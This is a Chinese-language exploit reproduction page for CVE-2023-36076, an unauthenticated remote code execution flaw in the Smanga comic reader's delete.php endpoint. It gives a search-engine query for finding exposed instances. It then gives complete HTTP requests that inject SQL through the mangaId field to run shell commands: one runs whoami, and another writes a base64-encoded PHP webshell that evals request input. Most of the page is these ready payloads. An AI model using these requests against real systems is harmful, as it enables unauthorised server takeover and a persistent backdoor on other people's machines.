# Smanga未授权远程代码执行漏洞(CVE-2023-36076) # 一、漏洞简介 Smanga无需配置,docker直装的漫画流媒体阅读工具。以emby plex为灵感,为解决漫画阅读需求而开发的漫画阅读器。在/php/manga/delete.php接口处存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。 # 二、影响版本 + Smanga # 三、资产测绘 + hunter`web.title=="smanga"` + 特征 ![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/6zH2rDbEXutDEKrx/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-384375.png) # 四、漏洞复现 ```java POST /php/manga/delete.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8 If-None-Match: "63ff3602-c6d" If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 360 mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true ``` ![1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59.png](./img/6zH2rDbEXutDEKrx/1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59-384132.png) 获取命令执行结果 ```java GET /php/manga/1.txt HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Length: 0 ``` ![1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce.png](./img/6zH2rDbEXutDEKrx/1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce-693600.png) 写入webshell ```java POST /php/manga/delete.php HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8 If-None-Match: "63ff3602-c6d" If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 360 mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true ``` webshell地址 ```java /php/manga/1.php ``` ![1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77.png](./img/6zH2rDbEXutDEKrx/1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77-383079.png) > 更新: 2024-02-29 23:55:42 > 原文: